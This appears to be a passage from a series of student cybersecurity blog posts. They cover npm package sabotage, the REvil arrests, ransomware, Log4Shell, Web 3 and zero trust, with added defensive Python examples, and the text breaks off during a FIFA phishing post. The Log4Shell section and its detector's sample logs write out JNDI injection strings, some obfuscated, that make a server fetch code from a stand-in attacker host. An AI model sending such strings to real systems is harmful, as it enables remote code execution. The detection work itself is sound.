Open-source software and its issues

A collection of some open-source software. [0]

What is open-source software (OSS)?

In software development, open source refers to code (that is, a program) that the public is free to view, modify and share[1]. This also means that when someone downloads and uses open-source software (OSS), the user is trusting that it is reliable.

One beauty of OSS is transparency: anyone can learn and improve their programming skills by reading and working with it. Many also believe it is better than proprietary software, since more viewers and contributors improve the odds that bugs are found and fixed and upgrades developed. In reality, however, few people are able to commit to maintaining their OSS projects consistently, especially when the project is large and the work is unpaid and unsupported. Although OSS developers can seek financial support through sponsorships (for example GitHub Sponsors) and crowdfunding (for example Buy Me A Coffee), maintenance contracts and proper compensation from the companies that depend on their work are rare[2].

Npm libraries ‘colors’ and ‘faker’ compromised by their creator?

In past years there have been several cases of OSS developers being asked by companies that use their projects to help with a problem, without compensation or even help with maintenance[2]. More recently, the npm packages ‘colors’ and ‘faker’ were reported compromised after users noticed that new versions produced unexpected output[2],[3]. The speculation is that Marak Squires, the creator of both packages, intentionally altered the source code in protest against companies that exploit OSS developers[2][3]. As a result, every project that depended on those npm packages was affected, including Amazon’s popular Cloud Development Kit, itself an OSS project[2].

Arising from this is the issue of ethics in OSS, specifically integrity, one leg of the security triad discussed in class. As mentioned earlier, one essence of open-source software is the freedom for anyone to improve the program. The Free Software Foundation further specifies this condition by stating that the improvement should benefit the whole community[4]. Though the motivations for developing OSS clearly vary, over the years OSS has gained favour mostly by staying reliable, and it is its community that ensures that.

So, going back to the npm issue: if the creator did indeed alter his creation as a protest, are his actions excusable? Is it ethically right to make breaking changes to your own creation knowing that other projects rely on it? It is tragic that programmers dedicate their time and energy to developing this code and share it for free, while companies use their work to make millions in profit and then demand help when problems arise. So even though Squires’ supposed actions are understandable and shine a light on a sad by-product of things being ‘open’, it has to be said that their consequence is a question about the reliability of OSS.

So what should be done? Proper compensation should certainly be established, if not for the product then at least for the service. Doing so keeps OSS developers motivated, as it shows respect for their creation and their efforts. That way, developers who mean well would not be tempted to tamper with their own code or to take it down.

Now, besides the creator being able to modify their own creation, part of the OSS principle is that anyone can contribute. So how are OSS projects kept secure from malicious modifications (besides being transparent)?

(Feel free to write your response as a comment below. 🙂 ) 
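One practical part of the answer, at least for consumers of OSS, is to pin exact versions, commit the lockfile, install with npm ci (which refuses to proceed when a downloaded tarball’s hash does not match the lockfile) and review every lockfile change before merging. The Python script below is an added example, not code from the original post, from npm, or from either package’s author: it diffs two constructed package-lock.json documents (the package names, versions and integrity hashes are made up) and flags bumped versions, tarballs whose hash changed without a version change, and direct dependencies declared as ranges rather than exact versions.

```python
import json
import re

# Constructed sample lockfiles in npm's lockfileVersion 2 layout, trimmed to the
# fields used here. Package versions and integrity hashes are made up.
LOCK_BEFORE = {
    "name": "demo-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"dependencies": {"colors": "^1.4.0", "faker": "5.5.3"}},
        "node_modules/colors": {"version": "1.4.0", "integrity": "sha512-aaa"},
        "node_modules/faker": {"version": "5.5.3", "integrity": "sha512-bbb"},
    },
}
LOCK_AFTER = {
    "name": "demo-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"dependencies": {"colors": "^1.4.0", "faker": "5.5.3"}},
        "node_modules/colors": {"version": "1.4.1", "integrity": "sha512-ccc"},
        # same version, different tarball hash: registry tarballs are immutable,
        # so this should never happen and deserves a hard look
        "node_modules/faker": {"version": "5.5.3", "integrity": "sha512-eee"},
        "node_modules/left-pad": {"version": "1.3.0", "integrity": "sha512-ddd"},
    },
}

# An exact semver version (optionally with a pre-release tag); anything else is a range.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")


def installed_packages(lock):
    """Map package name -> (version, integrity) from a lockfileVersion 2 document."""
    out = {}
    for path, entry in lock["packages"].items():
        if not path.startswith("node_modules/"):
            continue  # the "" entry is the root project, not a dependency
        # nested copies (a/node_modules/b) collapse onto the same name; good enough here
        name = path.rsplit("node_modules/", 1)[1]
        out[name] = (entry.get("version"), entry.get("integrity"))
    return out


def diff_lockfiles(before, after):
    """Report packages added, removed, or whose version/hash changed."""
    old, new = installed_packages(before), installed_packages(after)
    report = {"added": sorted(set(new) - set(old)),
              "removed": sorted(set(old) - set(new)),
              "changed": []}
    for name in sorted(set(old) & set(new)):
        (ov, oi), (nv, ni) = old[name], new[name]
        if ov != nv or oi != ni:
            report["changed"].append({
                "name": name, "old_version": ov, "new_version": nv,
                "integrity_changed": oi != ni,
                "same_version_new_hash": ov == nv and oi != ni,
            })
    return report


def unpinned_dependencies(lock):
    """Direct dependencies whose spec is a range rather than an exact version."""
    deps = lock["packages"][""].get("dependencies", {})
    return sorted(n for n, spec in deps.items() if not EXACT_VERSION.match(spec))


if __name__ == "__main__":
    print(json.dumps(diff_lockfiles(LOCK_BEFORE, LOCK_AFTER), indent=2))
    print("unpinned:", unpinned_dependencies(LOCK_BEFORE))
```

Run this in CI against the lockfile on the main branch and the one in the pull request; a "same_version_new_hash" hit or an unexpected version bump is a reason to stop and read the package’s diff before merging. Setting ignore-scripts=true in .npmrc additionally stops install-time scripts from running, which is where a hijacked package usually does its damage.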

References:

[0] B. Taubenblatt. “The case for open source software,” mcgilltribune.com https://www.mcgilltribune.com/sci-tech/the-case-for-open-source-software-011017/ (accessed on January 19, 2022)

[1]  “What is open source?,” opensource.com. https://opensource.com/resources/what-open-source#:~:text=Some%20people%20prefer%20open%20source,original%20authors%20might%20have%20missed. (accessed on: January 18, 2022)

[2] O. Williams. “Open source  developers, who work for free, are discovering they have power,” techcrunch.com. https://techcrunch.com/2022/01/18/open-source-developers-who-work-for-free-are-discovering-they-have-power/ (accessed on: January 18, 2022)

[3] H. Solomon. “Protest by open source developer raises questions about compensation and ethics,” itworldcanada.com. https://www.itworldcanada.com/article/protest-by-open-source-developer-raises-questions-about-compensation-and-ethics/470489 (accessed on: January 18, 2022)

[4] F. S. Grodzinsky et al., “Ethical Issues in Open Source Software,” researchgate.net. https://www.researchgate.net/publication/241209540_Ethical_issues_in_open_source_software

More related readings, if interested:

Russia Arrests 14 REvil Members

On January 14, 2022, the Russian government said it had arrested 14 alleged cybercriminals working for the ransomware group REvil, effectively crippling the group and the infrastructure it used[2]. The stated reason for the arrests was an earlier request from the US government for action against cybercriminals such as REvil.[1]

Image: Business Insider

The group, notorious for its hacking, had previously targeted many large American companies and businesses; notable incidents linked to the arrested members include the Colonial Pipeline cyberattack[3] and an attack on the American food processor JBS[1]. These attacks primarily used ransomware: the attackers would hold a system hostage and demand that the victim send money, usually cryptocurrency, to a wallet in exchange for a decryptor[3]. The group caused millions in damages and made millions from these attacks[3]. Many assets were seized when the Russian government raided and arrested these criminals, worth more than 5.6 million dollars in total.[1]

Image: CSO Online, photo by Andrey Popov / Getty Images

Why did the arrests come now? The US asked Russia to act and provided it with information last fall[4]. The arrest of prominent Russian cybercriminals comes at a time of high tension over Ukraine: Russia is currently building up troops on the border under the pretext of joint exercises with Belarus[5], and there have been many cyberattacks on Ukrainian government sites[7]. The arrests may therefore be a way of bargaining politically with the US; to many observers, Russia appears to be using the prospect of arresting cybercriminals as leverage in political discussions. They could become a negotiating point with the US over Ukraine, where the US backs off slightly in exchange for cooperation in capturing cybercriminals based in Russia, given that a large share of the cybercriminals attacking the US reside in Russia[6].

Image: Al Jazeera, photo by Baz Ratner / Reuters

What does this mean for cybersecurity?

It now seems that cybercriminals can no longer act with impunity even when they are outside the jurisdiction of the victim’s country. Russian cybercriminals previously seemed untouchable, since US law enforcement could not prosecute them on sovereign Russian territory. This did nothing to deter cyberattacks and allowed large ransomware organizations that primarily attack the US, such as DarkSide, REvil and GandCrab, to grow in Russia. With Russian cooperation, large cybercriminal groups will now be forced to be more discreet and will be prosecuted if they launch cyberattacks that affect people in democratic countries. Overall this would improve cybersecurity if Russia cooperates with American authorities in prosecuting cybercriminals in Russia. However, Russia would need to cooperate long term for the effects to last, which I highly doubt will happen.

References

  1. https://threatpost.com/russian-security-revil-ransomware/177660/
  2. https://www.wired.com/story/russia-revil-ransomware-arrests-ukraine/
  3. https://krebsonsecurity.com/2022/01/at-request-of-u-s-russia-rounds-up-14-revil-ransomware-affiliates/
  4. https://www.cnbc.com/2021/07/09/ransomware-biden-presses-putin-to-disrupt-cybercriminals-in-russia.html
  5. https://www.theguardian.com/world/2022/jan/17/russia-moves-troops-to-belarus-for-joint-exercises-near-ukraine-border
  6. https://www.theguardian.com/technology/2021/oct/11/russia-and-nearby-states-are-origin-of-most-ransomware-says-uk-cyber-chief
  7. https://www.bloomberg.com/news/articles/2022-01-14/several-ukraine-ministry-websites-struck-by-likely-cyberattack

Ransomware on the rise, how can you protect yourself?

What is Ransomware?

“Ransomware is a form of malware designed to encrypt files on a device, rendering any files and the systems that rely on them unusable. Malicious actors then demand ransom in exchange for decryption.” [1]

[9]

What does this mean?

Essentially, an attacker can lock you out of most of your system, and the only way to regain access to your files and devices is to pay a ransom to the attacker, usually in a cryptocurrency such as Bitcoin. Attackers demand cryptocurrency because payments are pseudonymous and much harder to trace to a person than a bank transfer (harder, not impossible: exchanges and blockchain analysis have led to recoveries and arrests). Without the decryption key (the key that unlocks the encrypted files) your files are inaccessible. The attackers are often located in jurisdictions from which Canada and the U.S.A. cannot extradite or charge them.

[11]

How are these attacks executed?

  • Phishing emails.
  • Visiting suspicious websites, which can download files to your device without your knowledge.
  • Web-based instant messaging platforms.
  • Directory traversal attacks against vulnerable web servers.

Ransomware on the rise

As a society we reap the benefits of an ever-growing digital world; however, we must learn how to properly protect ourselves from increasingly advanced digital attacks. Covid-19 in particular has exacerbated the issue, as attackers take advantage of the drastic increase in the number of people living and working online. In fact, it is reported that “ransomware attacks have increased 40% to 199.7 million cases globally in Q3 of [2020].” [2] More ransomware attacks means more individuals and corporations are being targeted, and this could be you! Ransomware has in fact affected the institution at which you are taking this class: the University of Calgary was hit by the “SamSam” ransomware in May 2016, and the attack concluded with the school paying $20,000 to the attackers to regain access to the infected files. [3,4]

The Log4Shell Golang “TellYouThePass” exploit

What is Log4Shell and Golang?

Log4Shell

On 9 December 2021 “the zero-day vulnerability in the ubiquitous Java logger Log4j 2, known as Log4Shell” was disclosed. [5] A zero-day vulnerability is one that was unknown to the vendor and defenders before it was exploited, so that no patch exists at the time of disclosure. (Log4Shell is tracked as CVE-2021-44228: an attacker who can get a string such as ${jndi:ldap://attacker-host/x} into a logged message makes Log4j 2 perform a JNDI lookup that fetches and runs attacker-supplied code.) The attack was first widely observed on the Java edition of Minecraft, and Google has confirmed that over 35,000 Java packages depend on Log4j 2. [5] The vulnerability was serious enough to receive a critical 10/10 CVSS rating, and nearly 1 million exploitation attempts were seen in just the 3 days after it became public. [5] “Check Point researchers also recently revealed a global average of 40% of corporate networks have seen Log4Shell exploitation attempts in the first few days of the vulnerability’s disclosure.” [5] It is evident that this vulnerability can be disastrous both for those who use affected applications and for those who produce them.

Depiction of how the attack works. [12]
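Attackers quickly started hiding the ${jndi:...} string behind Log4j’s own lookup syntax (${lower:j}, ${::-j}, ${env:X:-j}) and URL encoding, so a naive grep for "jndi" misses much of the traffic. The Python detector below is an added example, not code from the original post or its sources: it undoes those nesting tricks and URL encoding before looking for a JNDI lookup in web-server log lines. The log lines are constructed and the attacker address comes from a documentation range. Detection is not a fix, and this decoder handles only the obfuscations shown here; the fix is upgrading to a patched Log4j 2 release.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not real traffic). 198.51.100.7 is
# a documentation address standing in for the attacker's LDAP/RMI/DNS server.
SAMPLE_LOG = """
10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"
10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"
10.0.0.9 - - [10/Dec/2021:13:01:13 +0000] "GET /y HTTP/1.1" 200 0 "-" "%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Adns%3A%2F%2F198.51.100.7%2Fd%7D"
10.0.0.12 - - [10/Dec/2021:13:02:00 +0000] "POST /api HTTP/1.1" 200 12 "-" "curl/7.79 ${date:yyyy}"
"""

INNERMOST = re.compile(r"\$\{([^{}]*)\}")                       # a lookup with no nested lookup
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)  # ${jndi:<protocol>:...


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j would, for the forms attackers abuse."""
    body = match.group(1)
    if ":-" in body:                       # ${anything:-default} -> default value
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J} -> j
        return rest.lower()
    if sep and prefix.lower() == "upper":  # ${upper:j} -> J
        return rest.upper()
    return match.group(0)                  # jndi, date, ...: leave untouched


def decode_lookups(text, max_rounds=10):
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_log(log_text):
    """Return (line_number, protocol, decoded_payload) for every JNDI lookup found."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        decoded = decode_lookups(line)
        m = JNDI.search(decoded)
        if m:
            end = decoded.find("}", m.start())
            findings.append((n, m.group(1).lower(), decoded[m.start():end + 1]))
    return findings


if __name__ == "__main__":
    for n, proto, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: jndi over {proto}: {payload}")
```

Lines 3 to 5 are the obfuscated variants; after decoding they all reduce to a plain ${jndi:<protocol>://198.51.100.7/...} and are reported, while the harmless ${date:yyyy} on line 6 is ignored. In practice you would also decode the request path and headers such as X-Forwarded-For, since any field that ends up in a log line is a delivery channel.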
Go

Go (often written Golang) is a powerful cross-platform programming language designed at Google in 2007. [7] When a language is not cross-platform, an application must be built with a different set of tools for each operating system. Go has been gaining popularity fast and is listed among the top 11 programming languages by a UC Berkeley bootcamp blog. [7]

[10]

What is this particular exploit?

While most malware is written for a single operating system, this attack targets both Windows and Linux users. [6] It revives the TellYouThePass ransomware, now rewritten in Go. [6] While it may look like the same attack on the surface, using Go lets the attackers reuse the vast majority of the code across operating systems. This portability lets them infect a larger user base without extra effort.

The message sent to victims. Source: CrowdStrike

The Go version of TellYouThePass goes further than the original by obfuscating the binary. [6] Obfuscation replaces function, file and variable names with essentially meaningless ones and otherwise scrambles the program’s structure. This greatly hinders reverse engineering (working backwards from the malware to understand how the attack proceeds). Hindering analysis also delays the writing of detection signatures and the search for weaknesses in the ransomware’s encryption that might allow recovery without paying, leaving more victims exposed.

[8]

What is the significance of this exploit?

The growing prevalence of an exploit means that more individuals are targeted and thus face paying a ransom to regain access to their network and devices. The attackers demand 0.05 Bitcoin for the decryption key, roughly $2,100 USD at the time. [6] That is a hefty sum to pay to get your personal data back. With so many applications using Log4j 2 it is extremely difficult to keep these services, and yourself, protected. The cost could leave you or those you know in dire financial strain, as the choice is either to pay or to be unable to use your computer and devices. With so much of life now online, that could mean being unable to do your job or coursework, or to communicate with family and friends.

What can you do to protect yourself?

  • Update your machine regularly. This ensures that fixes for vulnerabilities in your operating system are applied before you become a victim.
  • Only use trusted software. Before running or installing a program, research it and verify that it is legitimate.
  • Update trusted software regularly. Updates and patches are often pushed specifically to fix security issues.
  • Keep up to date with new vulnerabilities by following websites that report on computer security, such as BleepingComputer.com.
  • Ensure your security software and firewall are active and updated. Modern built-in antivirus such as Windows Defender handles the majority of risks for regular usage. Run occasional malware scans as well.
  • Keep offline backups. A recent backup that the ransomware cannot reach (a disconnected drive, or versioned cloud storage) is the one control that lets you recover your files without paying.
  • Browser security. Add-ons can substantially improve your browser’s security. There may be an adjustment period, but it is worth it. Personally, in Firefox I use uBlock Origin, HTTPS Everywhere, NoScript, Decentraleyes, and Privacy Badger.

References
  • https://www.cisa.gov/stopransomware [1]
  • https://www.kratikal.com/blog/ransomware-attacks-increase-to-40-in-q3-2020/?utm_source=Ransomware%20Reminding%20Cyber%20Security%20Experts%20It%20Still%20Exists&utm_medium=Kratikal%20Blog&utm_campaign=Blog [2]
  • https://www.cbc.ca/news/canada/calgary/university-calgary-ransomware-cyberattack-1.3620979 [3]
  • https://calgarysun.com/news/crime/two-iranian-men-charged-by-fbi-in-ransomware-scheme-that-led-u-of-c-to-pay-20000 [4]
  • https://www.itpro.co.uk/security/zero-day-exploit/361819/what-is-log4shell-log4j-vulnerability [5]
  • https://www.itpro.co.uk/security/ransomware/361965/ransomware-rewritten-golang-to-target-windows-linux-users [6]
  • https://bootcamp.berkeley.edu/blog/most-in-demand-programming-languages/ [7]
  • https://i.ytimg.com/vi/rAOPpz5r3wM/maxresdefault.jpg [8]
  • https://www.kaspersky.com/content/en-global/images/repository/isc/2021/ransomware.jpg [9]
  • https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/1200px-Google_2015_logo.svg.png [10]
  • https://images.moneycontrol.com/static-mcnews/2021/01/Bitcoin-1-770×433.jpg?impolicy=website&width=770&height=431 [11]
  • https://www.splunk.com/content/dam/splunk2/en_us/images/campaigns/log4shell/log4j-attack-diagram-r3.jpg [12]

Web 3

Inspired by Dylan’s tweets, I decided to look into my stored data on Google through google.com/takeout and found out how much information they have about me, which is indeed worrisome…

In recent years we have seen big companies like Facebook and Google violate privacy by exploiting vast databases of user information. As web users become more conscious of this, they want to use the internet without interference and manipulation by these tech giants.

Such concern gave birth to Web 3 – the idea of a decentralized internet.

What exactly is Web 3?

The World Wide Web has gone through two stages of evolution, Web 1 and Web 2, which makes the next big thing Web 3.

The Evolution of World Wide Web

During Web 1, the first stage, the internet was a collection of read-only pages with no interactivity, mostly personal and small companies’ sites.

During Web 2, the current phase, websites are interactive: end users can comment, like, share and modify pages. Technology giants such as Google and Facebook control the most commonly used applications, which lets them gather huge databases and take advantage of user information.

Web 3, on the other hand, embraces the idea of decentralizing data storage by applying blockchain. Consider the internet as a collaboratively edited document, open to everyone. Anyone can edit the document, but every modification is appended as a new entry in the history, and each entry is cryptographically linked to the one before it. No one can alter the locked history; only the newest entry of the “ledger” can be extended. In Web 3 the document data and its history are kept on many individuals’ servers instead of a central server, and no single party controls everyone else’s copy.

Based on the application of blockchain, Web 3 is expected to protect user’s cyber privacy and security.

The future of privacy and security

1. Decentralized Ownership of Data Storage

In Web 3, a user’s data is no longer stored in data centres owned by tech companies. Unless someone controls a majority of the thousands of computers that make up the network, no one can rewrite your data or control your online activity. (A caveat: anything written to a public blockchain is visible to every participant, so the privacy benefit depends on keeping personal data off-chain or encrypted.)

2. More difficult for cyberattack

It also makes cyberattacks more challenging, since there is no single central database to attack. In Web 3 an attacker would have to compromise thousands of computers in the decentralized network simultaneously.

3. Any changes can be noticed

Since the nodes constantly validate each other’s copy of the chain, no change can be made without being noticed. This also means that no single party can take down applications or websites at their convenience.
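The “locked history” of the ledger analogy above and the claim that no change goes unnoticed both rest on one mechanism: each block carries the hash of the block before it. The Python below is an added example, not code from the original post or from any Web 3 project: a minimal hash-chained ledger with a constructed edit history, showing that editing an old entry breaks verification, and also what happens when the attacker owns the only copy.

```python
import hashlib
import json


def block_hash(index, prev_hash, timestamp, data):
    """SHA-256 over the block's contents; changing any field changes the hash."""
    payload = json.dumps([index, prev_hash, timestamp, data], sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()


class Ledger:
    """An append-only, hash-linked history of edits (one node's copy)."""

    GENESIS_PREV = "0" * 64

    def __init__(self):
        self.blocks = []
        self.append({"edit": "genesis"}, timestamp=0)

    def append(self, data, timestamp):
        index = len(self.blocks)
        prev = self.blocks[-1]["hash"] if self.blocks else self.GENESIS_PREV
        block = {"index": index, "prev_hash": prev, "timestamp": timestamp,
                 "data": data, "hash": block_hash(index, prev, timestamp, data)}
        self.blocks.append(block)
        return block

    def verify(self):
        """(True, None) if every link and hash checks out, else (False, first_bad_index)."""
        for i, b in enumerate(self.blocks):
            expected_prev = self.blocks[i - 1]["hash"] if i else self.GENESIS_PREV
            if b["prev_hash"] != expected_prev:
                return False, i
            if b["hash"] != block_hash(b["index"], b["prev_hash"], b["timestamp"], b["data"]):
                return False, i
        return True, None

    def head(self):
        """Hash of the newest block; two honest copies of the same history agree on it."""
        return self.blocks[-1]["hash"]


def rewrite_tail(ledger, start):
    """What an attacker who controls this single copy can do: re-hash from `start` on."""
    for i in range(start, len(ledger.blocks)):
        b = ledger.blocks[i]
        b["prev_hash"] = ledger.blocks[i - 1]["hash"] if i else Ledger.GENESIS_PREV
        b["hash"] = block_hash(b["index"], b["prev_hash"], b["timestamp"], b["data"])


def build_sample():
    """Constructed edit history, as held by every honest node."""
    ledger = Ledger()
    ledger.append({"edit": "add paragraph 1"}, timestamp=1)
    ledger.append({"edit": "fix typo"}, timestamp=2)
    ledger.append({"edit": "add paragraph 2"}, timestamp=3)
    return ledger


if __name__ == "__main__":
    honest, attacker = build_sample(), build_sample()
    print("honest copy valid:", honest.verify())
    attacker.blocks[1]["data"] = {"edit": "delete paragraph 1"}  # rewrite history
    print("tampered copy valid:", attacker.verify())
    rewrite_tail(attacker, 1)
    print("re-hashed copy valid:", attacker.verify())
    print("agrees with honest nodes:", attacker.head() == honest.head())
```

The hash chain gives tamper evidence, not tamper proofing: an attacker who controls a copy can re-hash everything after the edit and that copy verifies again. What stops this in a real network is that the other nodes still hold the honest history and its head hash, so the rewritten copy disagrees with them and is rejected; “no one can modify the locked history” really means “not without every other node noticing,” and it holds only while most of the nodes are honest.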

Last Thought

There are many controversies about Web 3. Many people worry about its lack of central control, especially by governments: anything can be shared, including unwanted content. In addition, the anonymity of Web 3 can open windows for criminal activity.

Web 3 is still a blurred picture in the early stage of drafting. Nonetheless, a privacy-oriented direction is worth considering for the development of the World Wide Web.

What do you think about Web 3? Share your thoughts in the comments section below!

References:

Cohen, B. (2018, April 23). Urban mobility: Web 2.0 (Uber) vs. Web 3.0 (Iomob). Medium. Retrieved January 19, 2022, from https://boydcohen.medium.com/urban-mobility-web-2-0-uber-vs-web-3-0-iomob-2e424a99f8bd

Crider, M. (2017, December 13). What is a “blockchain”? How-To Geek. Retrieved January 19, 2022, from https://www.howtogeek.com/335814/what-is-a-blockchain/

Curran, D. (2018, March 24). Twitter. Retrieved January 19, 2022, from https://twitter.com/iamdylancurran/status/977559925680467968

Litwack, S. (2020, May 6). Is a decentralized ‘web 3.0’ the answer to our privacy concerns? Retrieved January 19, 2022, from https://iapp.org/news/a/is-a-decentralized-web-3-0-the-answer-to-our-privacy-concerns/

Ogunmokun, A. (2022, January 13). Exactly how secure is web 3. HackerNoon. Retrieved January 19, 2022, from https://hackernoon.com/exactly-how-secure-is-web-3

O’Sullivan, F. (2022, January 14). What is Web3? How-To Geek. Retrieved January 19, 2022, from https://www.howtogeek.com/779970/what-is-web3%C2%A0/

Sharma, M. (2021, November 8). Web 1.0, web 2.0 and web 3.0 with their difference. GeeksforGeeks. Retrieved January 19, 2022, from https://www.geeksforgeeks.org/web-1-0-web-2-0-and-web-3-0-with-their-difference/

Zero-trust: Rebuilding the Broken Kingdom

Roman poet Juvenal once said, “Quis custodiet ipsos custodes?” which translates from Latin to “Who will watch the guards themselves?” 1

Image: Cyber Security Perth, DM1. 2

The model most organizations use for cybersecurity is so old it almost dates to the medieval era. That may sound absurd, but many agree it is true. Organizations have adopted a castle-like approach in which everything inside the network is trusted and everything outside is untrusted.4 The weakness of this model is its biggest blind spot: internal threats. According to Bank Info Security, “40% of breaches originate from authorized users.” 4

While these strategies were once effective at detecting or preventing infiltrators from disrupting networks, threats are on the rise and are forcing organizations and their users to respond with firm security priorities, in particular Zero-trust Network Access (ZTNA).

What is Zero-trust Security?

Zero-trust is a framework that removes implicit trust, regardless of a user’s level of privilege.4 In place of the old mantra “trust, but verify,” Zero-trust enforces “never trust, always verify.” 3 Organizations benefit from an improved security posture by verifying users, devices and applications at every access gateway, which reduces the time and resources spent on investigations after the fact. As stated in a research study conducted by Forrester Consulting, “Zero-Trust solutions can help to enhance security and reduce the chance of a data breach by 50 percent.” 5

How Does it Work?

Zero-trust uses three lines of defence to help prevent security breaches and limit the blast radius of attacks that do succeed:

Verify Constantly

Since many of today’s devices retrieve and store data on the move via cloud services, every such device is a potential threat vector to the network.7 Zero-trust therefore assumes breach and verifies every access, regardless of whether the device is a business workstation or a personal device.1,3 Most notably, verifying with Multi-Factor Authentication (MFA) is central to Zero-trust because it removes the risk of relying on a single factor such as a password. 4

Limit the Scope of a Breach

The basis of Zero-trust architecture is network segmentation. As ITPro puts it, “Systems and devices must be segregated according to the types of data they process and the access they permit. This can then limit the reach of a hacker once they get into the network.” 6 Containing an intruder means forcing them to make more moves, each of which can be detected, and network segmentation does just that.

Further, Zero-trust minimizes lateral attacker movement with the least-privilege access model, in which users are assigned no more access than their job requires.6 If a breach occurs, the attacker’s scope of impact is limited by those privilege constraints.

Automate Prevention, Detection and Response

Zero-trust relies on data collection to produce measurable action. However, logging every access decision is cumbersome because it generates heaps of data that security teams struggle to track. Machine learning and AI can help by surfacing threat indicators that would otherwise go unnoticed.6 In other words, when anomalies in usage patterns occur, the system flags them so that defenders can contain them faster than usual.6
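The three lines of defence above come together in a policy decision point: every request is checked for device posture and fresh MFA (verify constantly), against the role and network segment permitted for the resource (limit the scope), and every decision is logged so repeated denials can be surfaced (automate detection). The Python below is an added example, not code from the original post or from any ZTNA product: a deny-by-default evaluator over a constructed policy and a constructed batch of requests, including an attacker holding a stolen developer session who probes sideways.

```python
from collections import Counter
from dataclasses import dataclass

# Constructed policy for a hypothetical company: each resource lists the roles
# allowed to reach it and the network segments it may be reached from.
POLICY = {
    "hr-db":      {"roles": {"hr"},         "segments": {"corp-hr"}},
    "build-ci":   {"roles": {"dev", "sre"}, "segments": {"corp-eng", "vpn"}},
    "prod-admin": {"roles": {"sre"},        "segments": {"bastion"}},
}
MFA_MAX_AGE = 15 * 60  # seconds; older than this and the user must re-verify


@dataclass
class Request:
    user: str
    role: str
    device_compliant: bool  # e.g. disk encrypted, EDR running, OS patched
    mfa_age: int            # seconds since the user last completed MFA
    source_segment: str     # network segment the request arrives from
    resource: str


def decide(req):
    """Return (allowed, reason). Deny by default; every check must pass."""
    rule = POLICY.get(req.resource)
    if rule is None:
        return False, "unknown resource"
    if not req.device_compliant:
        return False, "device not compliant"
    if req.mfa_age > MFA_MAX_AGE:
        return False, "MFA too old, re-verify"
    if req.role not in rule["roles"]:
        return False, "role not permitted (least privilege)"
    if req.source_segment not in rule["segments"]:
        return False, "wrong network segment"
    return True, "ok"


def evaluate_all(requests):
    """Decide each request and keep one log entry per decision."""
    log = []
    for req in requests:
        allowed, reason = decide(req)
        log.append({"user": req.user, "resource": req.resource,
                    "allowed": allowed, "reason": reason})
    return log


def flag_anomalies(log, threshold=2):
    """Users with at least `threshold` denials: candidates for investigation."""
    denials = Counter(e["user"] for e in log if not e["allowed"])
    return sorted(u for u, n in denials.items() if n >= threshold)


# Constructed requests. "mallory" holds a stolen dev session and probes laterally.
REQUESTS = [
    Request("alice", "dev", True, 60, "corp-eng", "build-ci"),
    Request("alice", "dev", True, 60 * 60, "corp-eng", "build-ci"),
    Request("mallory", "dev", True, 60, "corp-eng", "prod-admin"),
    Request("mallory", "dev", True, 60, "corp-eng", "hr-db"),
    Request("mallory", "dev", False, 60, "vpn", "build-ci"),
    Request("bob", "sre", True, 30, "bastion", "prod-admin"),
]

if __name__ == "__main__":
    log = evaluate_all(REQUESTS)
    for entry in log:
        print(entry)
    print("flagged for review:", flag_anomalies(log))
```

Alice’s second request is refused not because her role changed but because her MFA is stale; Mallory’s valid developer session gets her nowhere near prod-admin or hr-db, and three denials in a row put her on the review list. In a real deployment the policy would live in the identity provider or access proxy and the denial counter would be a detection rule in the SIEM, but the shape of the decision is the same.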

Moving forward, Zero-trust reimagines the “castle framework” by equipping the army inside with better protection against infiltrators arriving from anywhere, rather than merely reinforcing the perimeter.


References

1. Nolle, T. (2022, January 17). Zero trust is hard but worth it. Network World. Retrieved January 19, 2022, from https://www.networkworld.com/article/3647290/zero-trust-is-hard-but-worth-it.html

2. Cyber security perth: IT security company // DM1. DM1. (2020, September 12). Retrieved January 19, 2022, from https://dm1.com.au/cyber-security-perth/

3. Carson, J. (n.d.). Here’s really how to do zero-trust security. Threatpost English Global threatpostcom. Retrieved January 19, 2022, from https://threatpost.com/zero-trust-future-security-risks/177502/

4. Jones, I. (2022, January 14). Zero trust is more than a buzzword. Bank Information Security. Retrieved January 19, 2022, from https://www.bankinfosecurity.com/blogs/zero-trust-more-than-buzzword-p-3171

5. Noureen, R. (2022, January 13). Zero trust helps drive 50% lower chance of Data Breach. Petri IT Knowledgebase. Retrieved January 19, 2022, from https://petri.com/microsoft-zero-trust-data-breach-reduced-risk

6. Millman, R. (2022, January 11). How to build a Zero trust model. IT PRO. Retrieved January 19, 2022, from https://www.itpro.co.uk/security/361919/how-to-build-a-zero-trust-model

7. Subhani, A. (2022, January 17). Council Post: Why you need a ‘zero trust’ cybersecurity plan. Forbes. Retrieved January 19, 2022, from https://www.forbes.com/sites/forbestechcouncil/2022/01/13/why-you-need-a-zero-trust-cybersecurity-plan/?sh=20e23b2a129d

FIFA Ultimate Team Phishing Attack, What Went Wrong?

Image credit: Eurogamer

On January 11, 2022, EA confirmed that several high-profile FIFA Ultimate Team accounts had been compromised after attackers targeted customer support. Several accounts worth around one thousand dollars were completely drained of resources or handed over to anonymous individuals online.

